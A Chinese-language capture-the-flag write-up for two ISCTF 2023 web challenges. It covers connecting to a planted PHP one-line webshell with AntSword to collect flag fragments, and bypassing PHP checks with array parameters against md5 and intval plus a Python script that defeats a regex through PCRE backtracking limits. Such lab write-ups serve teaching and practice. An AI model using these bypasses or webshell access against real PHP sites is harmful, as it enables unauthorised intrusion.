23isctf

where_is_the_flag

1.打开环境，上面有一句话木马，直接蚁剑上

flag1：蚁剑连接上就可以直接看见，FLAG1:Yunxi{d0c0

flag2:在根目录下就有   797a-4697-

 

flag3： 在主页面有一个start.sh里面有提示信息  

4dfe-9b48-50ff544c2273}

 start.sh的内容

#!/bin/sh
sed -i "s/{{FLAG1}}/${FLAG:0:10}/" /var/www/localhost/htdocs/flag.php
echo ${FLAG:10:10} > /flag2
export FLAG3=${FLAG:20}
FLAG3=${FLAG:20}
export FLAG="flag"
FLAG="flag"
httpd -D FOREGROUND

解释如下

sed -i "s/{{FLAG1}}/${FLAG:0:10}/" /var/www/localhost/htdocs/flag.php：这行命令使用sed（流编辑器）来处理/var/www/localhost/htdocs/flag.php文件。-i选项表示直接修改文件。s/{{FLAG1}}/${FLAG:0:10}/是sed的替换命令，它将文件中的{{FLAG1}}替换为环境变量FLAG的前10个字符。echo ${FLAG:10:10} > /flag2：这行命令使用echo输出FLAG环境变量的第11到第20个字符（因为索引从0开始），并将输出重定向到/flag2文件。export FLAG3=${FLAG:20}：这行命令将FLAG环境变量的第21个字符开始的子字符串赋值给FLAG3环境变量，并使用export命令使其在当前shell及其子进程中可用。FLAG3=${FLAG:20}：这行命令与上一行类似，也是将FLAG环境变量的第21个字符开始的子字符串赋值给FLAG3变量，但没有使用export，所以这个变量只在当前shell中有效。export FLAG="flag"：这行命令将FLAG环境变量的值设置为字符串"flag"，并使用export命令使其在当前shell及其子进程中可用

打开终端，执行命令echo $FLAG3

绕进你的心里

1.代码审计

<?php
highlight_file(__FILE__);
error_reporting(0);
require 'flag.php';
$str = (String)$_POST['pan_gu'];
$num = $_GET['zhurong'];
$lida1 = $_GET['hongmeng'];
$lida2 = $_GET['shennong'];
if($lida1 !== $lida2 && md5($lida1) === md5($lida2)){   //数组绕过echo "md5绕过了!";if(preg_match("/[0-9]/", $num)){     //匹配数字die('你干嘛?哎哟!');}elseif(intval($num)){                //匹配字符if(preg_match('/.+?ISCTF/is', $str)){die("再想想!");}if(stripos($str, '2023ISCTF') === false){die("就差一点点啦!");}echo $flag;}
}
?> 

2.payload：后面两个数组绕过不解释了，解释一下前面的绕过

?zhurong[]=1&hongmeng[]=2&shennong[]=3

第二层，绕过intval()限制，数字绕过

intval() 转换数组类型时，不关心数组中的内容，只判断数组中有没有元素。

    「空数组」返回 0
    「非空数组」返回 1

3.intval()限制字符绕过

第三层的绕过关键在pan_gu利用正则最大回溯绕过，看到'/.+?ISCTF/is'这种就要想到了，我们通过发送超长字符串的方式，使正则执行失败，最后绕过目标对PHP语言的限制。

网上找的通用回溯poc如下，需要对应不同题目改脚本：

import requestsurl = "http://172.16.17.201:50125/?zhurong[]=1&hongmeng[]=2&shennong[]=3"data = {'pan_gu': 'aaaaaaaaaa' * 250000 + '2023ISCTF'}r = requests.post(url, data=data)print(r.text)